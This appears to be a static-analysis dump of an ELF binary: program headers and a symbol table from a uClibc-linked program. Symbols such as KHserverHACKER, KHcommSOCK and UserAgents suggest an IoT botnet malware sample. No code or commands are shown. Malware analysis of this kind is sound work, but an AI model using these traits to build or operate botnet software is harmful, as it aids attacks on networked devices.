LOAD	0x0	0x400000	0x400000	0x20240	0x20240	5.3570	0x5	R E	0x10000	.reginfo .init .text .fini .rodata
LOAD	0x20240	0x460240	0x460240	0x9a0	0x7178	4.5336	0x6	RW	0x10000	.eh_frame .ctors .dtors .jcr .data.rel.ro .data .got .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x4000b4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x4000cc	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x400160	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x41b7d0	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x41b830	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x460240	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x460244	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x46024c	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x460254	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x460258	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x4602b0	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x460680	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x460bdc	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x460be0	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x460c10	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0xcba	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	21
C.1.3455	.symtab	0x41fdd0	24	OBJECT	<unknown>	DEFAULT	5
C.147.6073	.symtab	0x460258	40	OBJECT	<unknown>	DEFAULT	10
C.177.6364	.symtab	0x460294	16	OBJECT	<unknown>	DEFAULT	10
C.178.6365	.symtab	0x460280	20	OBJECT	<unknown>	DEFAULT	10
FRAMESZ	.symtab	0x20	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
FRAMESZ	.symtab	0x18	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
GPOFF	.symtab	0x18	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
GPOFF	.symtab	0x14	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
KHcommSOCK	.symtab	0x460c30	4	OBJECT	<unknown>	DEFAULT	15
KHserverHACKER	.symtab	0x4602e4	4	OBJECT	<unknown>	DEFAULT	11
LOCALSZ	.symtab	0x3	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
LOCALSZ	.symtab	0x1	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
LOCAL_ADDR	.symtab	0x460be0	4	OBJECT	<unknown>	DEFAULT	14
Q	.symtab	0x460c4c	16384	OBJECT	<unknown>	DEFAULT	15
RAOFF	.symtab	0x1c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
UserAgents	.symtab	0x460300	144	OBJECT	<unknown>	DEFAULT	11
V0OFF	.symtab	0x14	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_Exit	.symtab	0x40e270	92	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_	.symtab	0x460680	0	OBJECT	<unknown>	DEFAULT	12
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x460248	0	OBJECT	<unknown>	DEFAULT	7
__CTOR_LIST__	.symtab	0x460244	0	OBJECT	<unknown>	DEFAULT	7
__C_ctype_b	.symtab	0x4603a0	4	OBJECT	<unknown>	DEFAULT	11
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x41e680	768	OBJECT	<unknown>	DEFAULT	5
__C_ctype_tolower	.symtab	0x460670	4	OBJECT	<unknown>	DEFAULT	11
__C_ctype_tolower.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_tolower_data	.symtab	0x41ff40	768	OBJECT	<unknown>	DEFAULT	5
__C_ctype_toupper	.symtab	0x4603b0	4	OBJECT	<unknown>	DEFAULT	11
__C_ctype_toupper.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_toupper_data	.symtab	0x41e980	768	OBJECT	<unknown>	DEFAULT	5
__DTOR_END__	.symtab	0x460250	0	OBJECT	<unknown>	DEFAULT	8
__DTOR_LIST__	.symtab	0x46024c	0	OBJECT	<unknown>	DEFAULT	8
__EH_FRAME_BEGIN__	.symtab	0x460240	0	OBJECT	<unknown>	DEFAULT	6
__FRAME_END__	.symtab	0x460240	0	OBJECT	<unknown>	DEFAULT	6
__GI___C_ctype_b	.symtab	0x4603a0	4	OBJECT	<unknown>	HIDDEN	11
__GI___C_ctype_tolower	.symtab	0x460670	4	OBJECT	<unknown>	HIDDEN	11
__GI___C_ctype_toupper	.symtab	0x4603b0	4	OBJECT	<unknown>	HIDDEN	11
__GI___ctype_b	.symtab	0x4603a4	4	OBJECT	<unknown>	HIDDEN	11
__GI___ctype_tolower	.symtab	0x460674	4	OBJECT	<unknown>	HIDDEN	11
__GI___ctype_toupper	.symtab	0x4603b4	4	OBJECT	<unknown>	HIDDEN	11
__GI___errno_location	.symtab	0x40e3d0	24	FUNC	<unknown>	HIDDEN	3
__GI___fcntl_nocancel	.symtab	0x40e118	136	FUNC	<unknown>	HIDDEN	3
__GI___fgetc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	HIDDEN	3
__GI___glibc_strerror_r	.symtab	0x410560	68	FUNC	<unknown>	HIDDEN	3
__GI___h_errno_location	.symtab	0x414c90	24	FUNC	<unknown>	HIDDEN	3
__GI___libc_fcntl	.symtab	0x40e090	136	FUNC	<unknown>	HIDDEN	3
__GI___sigaddset	.symtab	0x411008	44	FUNC	<unknown>	HIDDEN	3
__GI___sigdelset	.symtab	0x411034	48	FUNC	<unknown>	HIDDEN	3
__GI___sigismember	.symtab	0x410fe0	40	FUNC	<unknown>	HIDDEN	3
__GI___uClibc_fini	.symtab	0x413ca0	204	FUNC	<unknown>	HIDDEN	3
__GI___uClibc_init	.symtab	0x413df4	140	FUNC	<unknown>	HIDDEN	3
__GI___xpg_strerror_r	.symtab	0x4105f0	388	FUNC	<unknown>	HIDDEN	3
__GI__exit	.symtab	0x40e270	92	FUNC	<unknown>	HIDDEN	3
__GI_abort	.symtab	0x4127f0	408	FUNC	<unknown>	HIDDEN	3
__GI_atoi	.symtab	0x413160	28	FUNC	<unknown>	HIDDEN	3
__GI_brk	.symtab	0x4180d0	112	FUNC	<unknown>	HIDDEN	3
__GI_clock_getres	.symtab	0x4143f0	88	FUNC	<unknown>	HIDDEN	3
__GI_close	.symtab	0x40e330	88	FUNC	<unknown>	HIDDEN	3
__GI_closedir	.symtab	0x414730	308	FUNC	<unknown>	HIDDEN	3
__GI_config_close	.symtab	0x415174	132	FUNC	<unknown>	HIDDEN	3
__GI_config_open	.symtab	0x4151f8	116	FUNC	<unknown>	HIDDEN	3
__GI_config_read	.symtab	0x414cb0	1220	FUNC	<unknown>	HIDDEN	3
__GI_connect	.symtab	0x410a10	92	FUNC	<unknown>	HIDDEN	3
__GI_dup2	.symtab	0x40dc60	88	FUNC	<unknown>	HIDDEN	3
__GI_errno	.symtab	0x466ea0	4	OBJECT	<unknown>	HIDDEN	15
__GI_execl	.symtab	0x413b00	196	FUNC	<unknown>	HIDDEN	3
__GI_execve	.symtab	0x414350	88	FUNC	<unknown>	HIDDEN	3
__GI_exit	.symtab	0x413400	236	FUNC	<unknown>	HIDDEN	3
__GI_fclose	.symtab	0x415400	512	FUNC	<unknown>	HIDDEN	3
__GI_fcntl	.symtab	0x40e090	136	FUNC	<unknown>	HIDDEN	3
__GI_fflush_unlocked	.symtab	0x416c2c	648	FUNC	<unknown>	HIDDEN	3
__GI_fgetc	.symtab	0x4168a0	264	FUNC	<unknown>	HIDDEN	3
__GI_fgetc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	HIDDEN	3
__GI_fgets	.symtab	0x4169b0	212	FUNC	<unknown>	HIDDEN	3
__GI_fgets_unlocked	.symtab	0x417050	276	FUNC	<unknown>	HIDDEN	3
__GI_fopen	.symtab	0x415600	28	FUNC	<unknown>	HIDDEN	3
__GI_fork	.symtab	0x40de00	88	FUNC	<unknown>	HIDDEN	3
__GI_fputs_unlocked	.symtab	0x40fd20	124	FUNC	<unknown>	HIDDEN	3
__GI_fseek	.symtab	0x418650	68	FUNC	<unknown>	HIDDEN	3
__GI_fseeko64	.symtab	0x4186a0	392	FUNC	<unknown>	HIDDEN	3
__GI_fstat	.symtab	0x418140	144	FUNC	<unknown>	HIDDEN	3
__GI_fwrite_unlocked	.symtab	0x40fda0	268	FUNC	<unknown>	HIDDEN	3
__GI_getc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	HIDDEN	3
__GI_getdtablesize	.symtab	0x40dfe0	72	FUNC	<unknown>	HIDDEN	3
__GI_getegid	.symtab	0x4144b0	16	FUNC	<unknown>	HIDDEN	3
__GI_geteuid	.symtab	0x40ddf0	16	FUNC	<unknown>	HIDDEN	3
__GI_getgid	.symtab	0x414570	16	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname	.symtab	0x410960	28	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname2	.symtab	0x410980	132	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname2_r	.symtab	0x417c90	948	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname_r	.symtab	0x41a8f0	940	FUNC	<unknown>	HIDDEN	3
__GI_gethostname	.symtab	0x41ad00	204	FUNC	<unknown>	HIDDEN	3
__GI_getpagesize	.symtab	0x4143b0	48	FUNC	<unknown>	HIDDEN	3
__GI_getpid	.symtab	0x40dd50	16	FUNC	<unknown>	HIDDEN	3
__GI_getrlimit	.symtab	0x414450	88	FUNC	<unknown>	HIDDEN	3
__GI_getsockname	.symtab	0x410a70	88	FUNC	<unknown>	HIDDEN	3
__GI_getuid	.symtab	0x4143e0	16	FUNC	<unknown>	HIDDEN	3
__GI_h_errno	.symtab	0x466ea4	4	OBJECT	<unknown>	HIDDEN	15
__GI_htonl	.symtab	0x4108a8	40	FUNC	<unknown>	HIDDEN	3
__GI_htons	.symtab	0x410890	24	FUNC	<unknown>	HIDDEN	3
__GI_inet_addr	.symtab	0x410910	72	FUNC	<unknown>	HIDDEN	3
__GI_inet_aton	.symtab	0x417b70	284	FUNC	<unknown>	HIDDEN	3
__GI_inet_ntop	.symtab	0x419120	868	FUNC	<unknown>	HIDDEN	3
__GI_inet_pton	.symtab	0x418c98	704	FUNC	<unknown>	HIDDEN	3
__GI_initstate_r	.symtab	0x413010	328	FUNC	<unknown>	HIDDEN	3
__GI_ioctl	.symtab	0x40e200	108	FUNC	<unknown>	HIDDEN	3
__GI_isatty	.symtab	0x4107a0	60	FUNC	<unknown>	HIDDEN	3
__GI_kill	.symtab	0x40e030	92	FUNC	<unknown>	HIDDEN	3
__GI_lseek64	.symtab	0x41ae60	164	FUNC	<unknown>	HIDDEN	3
__GI_memchr	.symtab	0x417170	260	FUNC	<unknown>	HIDDEN	3
__GI_memcpy	.symtab	0x40ff40	308	FUNC	<unknown>	HIDDEN	3
__GI_memmove	.symtab	0x417280	824	FUNC	<unknown>	HIDDEN	3
__GI_mempcpy	.symtab	0x4179e0	76	FUNC	<unknown>	HIDDEN	3
__GI_memrchr	.symtab	0x4177e0	260	FUNC	<unknown>	HIDDEN	3
__GI_memset	.symtab	0x40feb0	144	FUNC	<unknown>	HIDDEN	3
__GI_mmap	.symtab	0x414240	132	FUNC	<unknown>	HIDDEN	3
__GI_mremap	.symtab	0x414640	124	FUNC	<unknown>	HIDDEN	3
__GI_munmap	.symtab	0x414580	88	FUNC	<unknown>	HIDDEN	3
__GI_nanosleep	.symtab	0x4145e0	92	FUNC	<unknown>	HIDDEN	3
__GI_ntohl	.symtab	0x4108e8	40	FUNC	<unknown>	HIDDEN	3
__GI_ntohs	.symtab	0x4108d0	24	FUNC	<unknown>	HIDDEN	3
__GI_open	.symtab	0x40dcd0	124	FUNC	<unknown>	HIDDEN	3
__GI_opendir	.symtab	0x414984	260	FUNC	<unknown>	HIDDEN	3
__GI_pipe	.symtab	0x40db70	64	FUNC	<unknown>	HIDDEN	3
__GI_poll	.symtab	0x41aca0	92	FUNC	<unknown>	HIDDEN	3
__GI_raise	.symtab	0x418050	76	FUNC	<unknown>	HIDDEN	3
__GI_random	.symtab	0x4129b0	164	FUNC	<unknown>	HIDDEN	3
__GI_random_r	.symtab	0x412dd4	172	FUNC	<unknown>	HIDDEN	3
__GI_rawmemchr	.symtab	0x417720	192	FUNC	<unknown>	HIDDEN	3
__GI_read	.symtab	0x40df80	88	FUNC	<unknown>	HIDDEN	3
__GI_readdir64	.symtab	0x414b80	272	FUNC	<unknown>	HIDDEN	3
__GI_recv	.symtab	0x410b50	92	FUNC	<unknown>	HIDDEN	3
__GI_recvfrom	.symtab	0x410c34	32	FUNC	<unknown>	HIDDEN	3
__GI_sbrk	.symtab	0x4144c0	164	FUNC	<unknown>	HIDDEN	3
__GI_select	.symtab	0x40df5c	32	FUNC	<unknown>	HIDDEN	3
__GI_send	.symtab	0x410c60	92	FUNC	<unknown>	HIDDEN	3
__GI_sendto	.symtab	0x410d44	32	FUNC	<unknown>	HIDDEN	3
__GI_setsockopt	.symtab	0x410d70	124	FUNC	<unknown>	HIDDEN	3
__GI_setstate_r	.symtab	0x412c90	324	FUNC	<unknown>	HIDDEN	3
__GI_sigaction	.symtab	0x4142d0	28	FUNC	<unknown>	HIDDEN	3
__GI_sigaddset	.symtab	0x410e50	104	FUNC	<unknown>	HIDDEN	3
__GI_sigemptyset	.symtab	0x410ec0	36	FUNC	<unknown>	HIDDEN	3
__GI_signal	.symtab	0x410ef0	236	FUNC	<unknown>	HIDDEN	3
__GI_sigprocmask	.symtab	0x40e2d0	96	FUNC	<unknown>	HIDDEN	3
__GI_sleep	.symtab	0x4134f0	288	FUNC	<unknown>	HIDDEN	3
__GI_socket	.symtab	0x410df0	88	FUNC	<unknown>	HIDDEN	3
__GI_sprintf	.symtab	0x40e460	80	FUNC	<unknown>	HIDDEN	3
__GI_srandom_r	.symtab	0x412e80	400	FUNC	<unknown>	HIDDEN	3
__GI_stat	.symtab	0x41add0	144	FUNC	<unknown>	HIDDEN	3
__GI_strcasecmp	.symtab	0x41b5b0	108	FUNC	<unknown>	HIDDEN	3
__GI_strchr	.symtab	0x410460	248	FUNC	<unknown>	HIDDEN	3
__GI_strchrnul	.symtab	0x417a30	248	FUNC	<unknown>	HIDDEN	3
__GI_strcmp	.symtab	0x410240	44	FUNC	<unknown>	HIDDEN	3
__GI_strcoll	.symtab	0x410240	44	FUNC	<unknown>	HIDDEN	3
__GI_strcpy	.symtab	0x410370	36	FUNC	<unknown>	HIDDEN	3
__GI_strcspn	.symtab	0x417690	144	FUNC	<unknown>	HIDDEN	3
__GI_strdup	.symtab	0x41af10	140	FUNC	<unknown>	HIDDEN	3
__GI_strlen	.symtab	0x410180	184	FUNC	<unknown>	HIDDEN	3
__GI_strncpy	.symtab	0x4103a0	188	FUNC	<unknown>	HIDDEN	3
__GI_strnlen	.symtab	0x410270	248	FUNC	<unknown>	HIDDEN	3
__GI_strpbrk	.symtab	0x417b30	64	FUNC	<unknown>	HIDDEN	3
__GI_strrchr	.symtab	0x417940	160	FUNC	<unknown>	HIDDEN	3
__GI_strspn	.symtab	0x4178f0	72	FUNC	<unknown>	HIDDEN	3
__GI_strstr	.symtab	0x410080	256	FUNC	<unknown>	HIDDEN	3
__GI_strtok	.symtab	0x4105d0	32	FUNC	<unknown>	HIDDEN	3
__GI_strtok_r	.symtab	0x4175c0	208	FUNC	<unknown>	HIDDEN	3
__GI_strtol	.symtab	0x413180	28	FUNC	<unknown>	HIDDEN	3
__GI_sysconf	.symtab	0x41380c	748	FUNC	<unknown>	HIDDEN	3
__GI_tcgetattr	.symtab	0x4107e0	176	FUNC	<unknown>	HIDDEN	3
__GI_time	.symtab	0x40dd60	16	FUNC	<unknown>	HIDDEN	3
__GI_times	.symtab	0x4146c0	16	FUNC	<unknown>	HIDDEN	3
__GI_toupper	.symtab	0x40e390	60	FUNC	<unknown>	HIDDEN	3
__GI_uname	.symtab	0x41b550	88	FUNC	<unknown>	HIDDEN	3
__GI_vfork	.symtab	0x40dc10	76	FUNC	<unknown>	HIDDEN	3
__GI_vsnprintf	.symtab	0x40e4b0	252	FUNC	<unknown>	HIDDEN	3
__GI_wait4	.symtab	0x4142f0	92	FUNC	<unknown>	HIDDEN	3
__GI_waitpid	.symtab	0x40de60	28	FUNC	<unknown>	HIDDEN	3
__GI_wcrtomb	.symtab	0x415270	108	FUNC	<unknown>	HIDDEN	3
__GI_wcsnrtombs	.symtab	0x415320	216	FUNC	<unknown>	HIDDEN	3
__GI_wcsrtombs	.symtab	0x4152e0	64	FUNC	<unknown>	HIDDEN	3
__GI_write	.symtab	0x40e1a0	88	FUNC	<unknown>	HIDDEN	3
__JCR_END__	.symtab	0x460254	0	OBJECT	<unknown>	DEFAULT	9
__JCR_LIST__	.symtab	0x460254	0	OBJECT	<unknown>	DEFAULT	9
__app_fini	.symtab	0x466e8c	4	OBJECT	<unknown>	HIDDEN	15
__atexit_lock	.symtab	0x460620	24	OBJECT	<unknown>	DEFAULT	11
__bss_start	.symtab	0x460be0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x413d6c	136	FUNC	<unknown>	DEFAULT	3
__close_nameservers	.symtab	0x41a7a0	220	FUNC	<unknown>	HIDDEN	3
__ctype_b	.symtab	0x4603a4	4	OBJECT	<unknown>	DEFAULT	11
__ctype_tolower	.symtab	0x460674	4	OBJECT	<unknown>	DEFAULT	11
__ctype_toupper	.symtab	0x4603b4	4	OBJECT	<unknown>	DEFAULT	11
__curbrk	.symtab	0x466eb0	4	OBJECT	<unknown>	HIDDEN	15
__data_start	.symtab	0x4602c0	0	OBJECT	<unknown>	DEFAULT	11
__decode_dotted	.symtab	0x419490	400	FUNC	<unknown>	HIDDEN	3
__decode_header	.symtab	0x41b0c0	228	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__dns_lookup	.symtab	0x419620	2612	FUNC	<unknown>	HIDDEN	3
__do_global_ctors_aux	.symtab	0x41b760	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux	.symtab	0x400160	0	FUNC	<unknown>	DEFAULT	3
__dso_handle	.symtab	0x460bdc	0	OBJECT	<unknown>	HIDDEN	13
__encode_dotted	.symtab	0x41b620	316	FUNC	<unknown>	HIDDEN	3
__encode_header	.symtab	0x41afa0	276	FUNC	<unknown>	HIDDEN	3
__encode_question	.symtab	0x41b1b0	172	FUNC	<unknown>	HIDDEN	3
__environ	.symtab	0x466e84	4	OBJECT	<unknown>	DEFAULT	15
__errno_location	.symtab	0x40e3d0	24	FUNC	<unknown>	DEFAULT	3
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x466e70	4	OBJECT	<unknown>	HIDDEN	15
__fcntl_nocancel	.symtab	0x40e118	136	FUNC	<unknown>	DEFAULT	3
__fgetc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	DEFAULT	3
__fini_array_end	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__fini_array_start	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__get_hosts_byname_r	.symtab	0x41a880	104	FUNC	<unknown>	HIDDEN	3
__getdents64	.symtab	0x418480	460	FUNC	<unknown>	HIDDEN	3
__getpagesize	.symtab	0x4143b0	48	FUNC	<unknown>	DEFAULT	3
__glibc_strerror_r	.symtab	0x410560	68	FUNC	<unknown>	DEFAULT	3
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__h_errno_location	.symtab	0x414c90	24	FUNC	<unknown>	DEFAULT	3
__h_errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__init_array_end	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__init_array_start	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__libc_close	.symtab	0x40e330	88	FUNC	<unknown>	DEFAULT	3
__libc_connect	.symtab	0x410a10	92	FUNC	<unknown>	DEFAULT	3
__libc_fcntl	.symtab	0x40e090	136	FUNC	<unknown>	DEFAULT	3
__libc_fork	.symtab	0x40de00	88	FUNC	<unknown>	DEFAULT	3
__libc_lseek64	.symtab	0x41ae60	164	FUNC	<unknown>	DEFAULT	3
__libc_nanosleep	.symtab	0x4145e0	92	FUNC	<unknown>	DEFAULT	3
__libc_open	.symtab	0x40dcd0	124	FUNC	<unknown>	DEFAULT	3
__libc_read	.symtab	0x40df80	88	FUNC	<unknown>	DEFAULT	3
__libc_recv	.symtab	0x410b50	92	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom	.symtab	0x410c34	32	FUNC	<unknown>	DEFAULT	3
__libc_select	.symtab	0x40df5c	32	FUNC	<unknown>	DEFAULT	3
__libc_send	.symtab	0x410c60	92	FUNC	<unknown>	DEFAULT	3
__libc_sendto	.symtab	0x410d44	32	FUNC	<unknown>	DEFAULT	3
__libc_sigaction	.symtab	0x4142d0	28	FUNC	<unknown>	DEFAULT	3
__libc_stack_end	.symtab	0x466e80	4	OBJECT	<unknown>	DEFAULT	15
__libc_waitpid	.symtab	0x40de60	28	FUNC	<unknown>	DEFAULT	3
__libc_write	.symtab	0x40e1a0	88	FUNC	<unknown>	DEFAULT	3
__local_nameserver	.symtab	0x41ff20	16	OBJECT	<unknown>	HIDDEN	5
__malloc_consolidate	.symtab	0x4122f4	520	FUNC	<unknown>	HIDDEN	3
__malloc_largebin_index	.symtab	0x411070	140	FUNC	<unknown>	DEFAULT	3
__malloc_lock	.symtab	0x460520	24	OBJECT	<unknown>	DEFAULT	11
__malloc_state	.symtab	0x467040	888	OBJECT	<unknown>	DEFAULT	15
__malloc_trim	.symtab	0x4121d0	292	FUNC	<unknown>	DEFAULT	3
__nameserver	.symtab	0x460c04	4	OBJECT	<unknown>	HIDDEN	14
__nameservers	.symtab	0x460c08	4	OBJECT	<unknown>	HIDDEN	14
__open_etc_hosts	.symtab	0x41b260	32	FUNC	<unknown>	HIDDEN	3
__open_nameservers	.symtab	0x41a130	1636	FUNC	<unknown>	HIDDEN	3
__pagesize	.symtab	0x466e88	4	OBJECT	<unknown>	DEFAULT	15
__preinit_array_end	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__preinit_array_start	.symtab	0x460244	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__progname	.symtab	0x460644	4	OBJECT	<unknown>	DEFAULT	11
__progname_full	.symtab	0x460648	4	OBJECT	<unknown>	DEFAULT	11
__pthread_initialize_minimal	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__pthread_mutex_init	.symtab	0x413c68	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_lock	.symtab	0x413c60	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_trylock	.symtab	0x413c60	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_unlock	.symtab	0x413c60	8	FUNC	<unknown>	DEFAULT	3
__pthread_return_0	.symtab	0x413c60	8	FUNC	<unknown>	DEFAULT	3
__read_etc_hosts_r	.symtab	0x41b280	712	FUNC	<unknown>	HIDDEN	3
__register_frame_info	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__res_sync	.symtab	0x460bfc	4	OBJECT	<unknown>	HIDDEN	14
__resolv_attempts	.symtab	0x460661	1	OBJECT	<unknown>	HIDDEN	11
__resolv_lock	.symtab	0x466ed0	24	OBJECT	<unknown>	DEFAULT	15
__resolv_timeout	.symtab	0x460660	1	OBJECT	<unknown>	HIDDEN	11
__rtld_fini	.symtab	0x466e90	4	OBJECT	<unknown>	HIDDEN	15
__searchdomain	.symtab	0x460c00	4	OBJECT	<unknown>	HIDDEN	14
__searchdomains	.symtab	0x460c0c	4	OBJECT	<unknown>	HIDDEN	14
__sigaddset	.symtab	0x411008	44	FUNC	<unknown>	DEFAULT	3
__sigdelset	.symtab	0x411034	48	FUNC	<unknown>	DEFAULT	3
__sigismember	.symtab	0x410fe0	40	FUNC	<unknown>	DEFAULT	3
__start	.symtab	0x4002b0	100	FUNC	<unknown>	DEFAULT	3
__stdin	.symtab	0x46040c	4	OBJECT	<unknown>	DEFAULT	11
__stdio_READ	.symtab	0x418830	144	FUNC	<unknown>	HIDDEN	3
__stdio_WRITE	.symtab	0x415620	296	FUNC	<unknown>	HIDDEN	3
__stdio_adjust_position	.symtab	0x4188c0	292	FUNC	<unknown>	HIDDEN	3
__stdio_fwrite	.symtab	0x415ae0	472	FUNC	<unknown>	HIDDEN	3
__stdio_init_mutex	.symtab	0x40e66c	32	FUNC	<unknown>	HIDDEN	3
__stdio_mutex_initializer.4474	.symtab	0x41ec80	24	OBJECT	<unknown>	DEFAULT	5
__stdio_rfill	.symtab	0x4189f0	88	FUNC	<unknown>	HIDDEN	3
__stdio_seek	.symtab	0x418b40	112	FUNC	<unknown>	HIDDEN	3
__stdio_trans2r_o	.symtab	0x418a50	228	FUNC	<unknown>	HIDDEN	3
__stdio_trans2w_o	.symtab	0x415cc0	312	FUNC	<unknown>	HIDDEN	3
__stdio_wcommit	.symtab	0x40e7c0	100	FUNC	<unknown>	HIDDEN	3
__stdout	.symtab	0x460410	4	OBJECT	<unknown>	DEFAULT	11
__sys_recvfrom	.symtab	0x410bb0	132	FUNC	<unknown>	DEFAULT	3
__sys_sendto	.symtab	0x410cc0	132	FUNC	<unknown>	DEFAULT	3
__syscall_error	.symtab	0x40dbb0	92	FUNC	<unknown>	DEFAULT	3
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_rt_sigaction	.symtab	0x4146d0	88	FUNC	<unknown>	DEFAULT	3
__syscall_rt_sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_select	.symtab	0x40dee0	124	FUNC	<unknown>	DEFAULT	3
__uClibc_fini	.symtab	0x413ca0	204	FUNC	<unknown>	DEFAULT	3
__uClibc_init	.symtab	0x413df4	140	FUNC	<unknown>	DEFAULT	3
__uClibc_main	.symtab	0x413e80	948	FUNC	<unknown>	DEFAULT	3
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uclibc_progname	.symtab	0x460640	4	OBJECT	<unknown>	HIDDEN	11
__vfork	.symtab	0x40dc10	76	FUNC	<unknown>	DEFAULT	3
__xpg_strerror_r	.symtab	0x4105f0	388	FUNC	<unknown>	DEFAULT	3
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat32_conv	.symtab	0x4182c8	220	FUNC	<unknown>	HIDDEN	3
__xstat64_conv	.symtab	0x4181d0	248	FUNC	<unknown>	HIDDEN	3
__xstat_conv	.symtab	0x4183a4	220	FUNC	<unknown>	HIDDEN	3
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_bss_custom_printf_spec	.symtab	0x466c70	10	OBJECT	<unknown>	DEFAULT	15
_charpad	.symtab	0x40e830	156	FUNC	<unknown>	DEFAULT	3
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_custom_printf_arginfo	.symtab	0x466fe0	40	OBJECT	<unknown>	HIDDEN	15
_custom_printf_handler	.symtab	0x467008	40	OBJECT	<unknown>	HIDDEN	15
_custom_printf_spec	.symtab	0x460510	4	OBJECT	<unknown>	HIDDEN	11
_dl_aux_init	.symtab	0x4180a0	40	FUNC	<unknown>	DEFAULT	3
_dl_phdr	.symtab	0x460bf4	4	OBJECT	<unknown>	DEFAULT	14
_dl_phnum	.symtab	0x460bf8	4	OBJECT	<unknown>	DEFAULT	14
_edata	.symtab	0x460be0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x4673b8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_errno	.symtab	0x466ea0	4	OBJECT	<unknown>	DEFAULT	15
_exit	.symtab	0x40e270	92	FUNC	<unknown>	DEFAULT	3
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fbss	.symtab	0x460be0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_fdata	.symtab	0x4602b0	0	NOTYPE	<unknown>	DEFAULT	11
_fini	.symtab	0x41b7d0	28	FUNC	<unknown>	DEFAULT	4
_fixed_buffers	.symtab	0x464c68	8192	OBJECT	<unknown>	DEFAULT	15
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x40e8cc	232	FUNC	<unknown>	DEFAULT	3
